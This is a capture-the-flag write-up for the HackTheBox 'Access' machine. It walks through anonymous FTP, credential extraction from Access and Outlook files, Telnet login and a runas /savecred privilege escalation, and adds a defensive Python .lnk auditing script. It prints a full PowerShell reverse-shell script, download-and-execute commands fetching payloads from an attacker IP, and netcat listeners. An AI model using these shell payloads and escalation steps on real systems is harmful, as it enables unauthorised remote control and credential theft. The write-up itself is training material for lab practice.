HackTheBox Access

Writeup for HackTheBox Access

Machine Synopsis

IP Address: 10.129.198.185

Key Exploitation Techniques:

  • Information Leakage: Exploiting an anonymous FTP misconfiguration to download sensitive files.
  • Credential Harvesting: Extracting credentials from a Microsoft Access database (.mdb) and a password-protected Outlook data file (.pst).
  • Privilege Escalation: Abusing the runas /savecred command to gain an elevated shell as the Administrator.

1. Enumeration

Initial reconnaissance with nmap revealed three open ports on the target.

nmap -p 21,23,80 -sC -sV 10.129.198.185 -T4

Nmap Results:

  • Port 21 (FTP): Microsoft ftpd with anonymous login allowed.
  • Port 23 (Telnet): An open Telnet service.
  • Port 80 (HTTP): Microsoft IIS httpd 7.5 with the title “MegaCorp.”

The most significant finding was the anonymous FTP access. Although the directory listing failed initially, we could manually change directories and discover files.

File Enumeration via FTP

We connected to the FTP service and explored the directories, finding two notable files.

ftp 10.129.198.185
Name: anonymous
Password: [press enter]

ftp> dir
# ...
<DIR>          Backups
<DIR>          Engineer
# ...

ftp> cd Backups
ftp> get backup.mdb
# ...
ftp> cd ../Engineer
ftp> get "Access Control.zip"
# ...

This confirmed we could download files from the server. The backup.mdb is a Microsoft Access database file, and Access Control.zip is a password-protected archive.


2. Exploitation: Information Leakage & Credential Harvesting

Step 2.1: Extracting Credentials from backup.mdb

The backup.mdb file likely contains sensitive data. We used mdb-export to dump the contents of the auth_user table, which contained a list of usernames and passwords.

mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

The output provided three sets of credentials:

  • admin:admin
  • engineer:access4u@security
  • backup_admin:admin

Step 2.2: Cracking the .zip Archive Password

The engineer user’s password, access4u@security, looked promising. We attempted to use it as the password for the Access Control.zip file, and it worked.

7z x "Access Control.zip" -paccess4u@security

The archive extracted a file named Access Control.pst. This is an Outlook data file, which can contain emails, contacts, and calendar items.

Step 2.3: Reading Access Control.pst

We used the readpst tool to convert the .pst file into a readable .eml format.

readpst -tea -m "Access Control.pst"
Opening PST file and indexes...
Processing Folder "Deleted Items"
        "Access Control" - 2 items done, 0 items skipped.

The tool created a directory named Access Control containing the extracted emails. We found an email from a user named john with the subject “MegaCorp Access Control System ‘security’ account.” The email contained the credentials for a new account.

cat 2.eml
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="--boundary-LibPST-iamunique-39011009_-_-"

----boundary-LibPST-iamunique-39011009_-_-
Content-Type: multipart/alternative;
    boundary="alt---boundary-LibPST-iamunique-39011009_-_-"

--alt---boundary-LibPST-iamunique-39011009_-_-
Content-Type: text/plain; charset="utf-8"

Hi there,
 
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.
 

Regards,

John

Password: 4Cc3ssC0ntr0ller

Step 2.4: Initial Access via Telnet

We used the newly discovered credentials to log in via the Telnet service on port 23.

telnet 10.129.198.185
login: security
password: 4Cc3ssC0ntr0ller

A Telnet session was established, and the whoami command confirmed we were logged in as access\security. From here, we used a PowerShell reverse shell to gain a more stable and interactive shell.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.22/payload.ps1')"

payload.ps1 (served from the attacking machine):
$LHOST = "10.10.16.22"; $LPORT = 4444; if ($LHOST -match ':') { $addressFamily = [System.Net.Sockets.AddressFamily]::InterNetworkV6; $client = New-Object System.Net.Sockets.TCPClient($addressFamily); } else { $client = New-Object System.Net.Sockets.TCPClient; }; $client.Connect($LHOST, $LPORT); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte, 0, $sendbyte.Length);$stream.Flush()};$client.Close();

The payload.ps1 script, hosted on our attacking machine, executed and connected back to our listener.

Shiro ❯  rlwrap -cAr nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.129.198.185 49158
whoami
access\security
PS C:\Users\security> 

3. Privilege Escalation

The security user is a standard user and does not have administrative privileges. To get an Administrator-level shell, we needed to find a way to escalate privileges.

Step 3.1: Abusing runas /savecred

The cmdkey /list command lists the credentials saved in Windows Credential Manager for the current user. In this case, it showed a saved domain password for the Administrator account.

PS C:\Users\security> cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator

The runas /savecred command runs an application as another user; the first time it is used it prompts for that user's password and saves it in Credential Manager, so later invocations need no password at all. The important security point is that once a password has been saved for a user, runas /savecred will execute any command as that user, not just the application the credential was originally saved for.

PS C:\Users\security> Get-ChildItem "C:\" *.lnk -Recurse -Force | ft fullname | Out-File shortcuts.txt
PS C:\Users\security> ForEach($file in gc .\shortcuts.txt) { Write-Output $file; gc $file | Select-String runas }

FullName
--------
C:\Users\Public\Desktop\ZKAccess3.5 Security System.lnk

# Readable strings from the binary .lnk (non-printable bytes omitted):
C:\Windows\System32\runas.exe
..\..\..\Windows\System32\runas.exe
C:\ZKTeco\ZKAccess3.5
/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"
C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico
%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico
S-1-5-21-953262931-566350628-63446256-500
# ...

PS C:\Users\security> icacls C:\Users\Public\Desktop

C:\Users\Public\Desktop BUILTIN\Administrators:(OI)(CI)(F)
                        NT AUTHORITY\INTERACTIVE:(OI)(CI)(RX)
                        NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                        ACCESS\Administrator:(OI)(CI)(IO)(DE,DC)

We confirmed that a shortcut (.lnk) file for the ZKAccess3.5 Security System application existed in C:\Users\Public\Desktop and that it launched Access.exe through runas /savecred as ACCESS\Administrator.
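A more reliable way to audit shortcuts than grepping binary .lnk files with Select-String is to parse the Shell Link format and read the argument string directly. The Python below is an added example, not part of the original writeup: it implements the parts of the MS-SHLLINK layout needed to pull out the StringData fields, flags any shortcut that invokes runas.exe with /savecred, and uses a constructed sample .lnk (built by build_lnk, a helper written for this example) containing the strings recovered above so it runs offline.

```python
import struct
import uuid

# Shell Link (.lnk) LinkFlags bits, MS-SHLLINK section 2.1.1
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData fields appear in this fixed order, each present only if its bit is set
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))
LINK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk without resolving or running it."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (uint16) + IDList bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:            # LinkInfoSize (uint32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, name in STRING_FIELDS:      # each field: uint16 CountCharacters + chars
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + count * width]
            fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += count * width
    return fields

def uses_savecred(fields: dict) -> bool:
    """True when the shortcut launches runas.exe with /savecred (stored credential)."""
    target = (fields.get("relative_path", "") + fields.get("name", "")).lower()
    return "runas" in target and "/savecred" in fields.get("arguments", "").lower()

def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed minimal Unicode .lnk for testing (no IDList, no LinkInfo)."""
    flags = 0x08 | 0x20 | IS_UNICODE  # HasRelativePath | HasArguments | IsUnicode
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LINK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # ShowCommand = 1
    body = b""
    for s in (relative_path, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body

# Constructed sample mirroring the strings recovered from the ZKAccess3.5 shortcut
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\runas.exe",
                       r'/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"')
```

On a real host, feed parse_lnk the bytes of each .lnk found under C:\Users and C:\ProgramData; any hit from uses_savecred means a Credential Manager entry exists that runas will honour for arbitrary commands, and the entry should be removed with cmdkey /delete and the shortcut reworked.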

We can use this stored credential to run a new PowerShell reverse shell as the Administrator.

PS C:\Users\security> runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.22/admin_payload.ps1')"

This command executed our second PowerShell payload, which connected back to a different listener on our machine, this time with Administrator privileges.

rlwrap -cAr nc -lvnp 8888
# ...
whoami
# access\administrator

We now have an elevated shell.


4. Flag Retrieval

With our elevated shell, we could access both the user and root flags.

PS C:\Windows\system32> type C:\Users\security\Desktop\user.txt
<redacted>
PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
<redacted>

This post is licensed under CC BY 4.0 by the author.